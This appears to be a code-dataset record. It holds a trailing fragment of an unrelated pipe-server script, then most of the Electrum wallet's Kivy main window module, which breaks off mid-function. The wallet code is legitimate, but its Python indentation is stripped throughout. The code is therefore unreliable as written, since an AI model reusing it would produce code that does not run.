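# mirrored by the test client above (values after the prefixes are
# illustrative):
#   'ping'                                   -- connectivity check, ignored
#   'restart'                                -- asks the host to reset the pipe
#   'package.path:<lua package.path string>' -- used to locate the x4 folder
#   'modules:extensions/<ext>/<module>.py;'  -- semicolon-terminated module list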
if __name__ == '__main__':
Main()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
PR_PAID, PR_FAILED, maybe_extract_bolt11_invoice)
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import PasswordDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; the timeout is set to
# forever so the data stays cached.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = req['status']
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment was sent'))
self._trigger_update_history()
elif status == PR_FAILED:
self.show_info(_('Payment failed'))
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Screen orientation, as determined from the window size.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # Create triggers so that GUI updates happen at most twice per second.
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_channels, ['channels_updated'])
self.network.register_callback(self.on_channel, ['channel'])
self.network.register_callback(self.on_invoice_status, ['invoice_status'])
self.network.register_callback(self.on_request_status, ['request_status'])
self.network.register_callback(self.on_channel_db, ['channel_db'])
self.network.register_callback(self.set_num_peers, ['gossip_peers'])
self.network.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
def on_success(x):
# save pin_code so that we can create backups
self.password = x
self.load_wallet(wallet)
self.password_dialog(
check_password=wallet.check_password,
on_success=on_success,
on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
self.password = pw
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(
check_password=storage.check_password,
on_success=on_password,
on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if not self.wallet.has_lightning():
self.show_error('Lightning not enabled on this wallet')
return
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 5*60:
self.password_dialog(check_password=self.check_pin_code, on_success=None, on_failure=self.stop, is_password=False)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
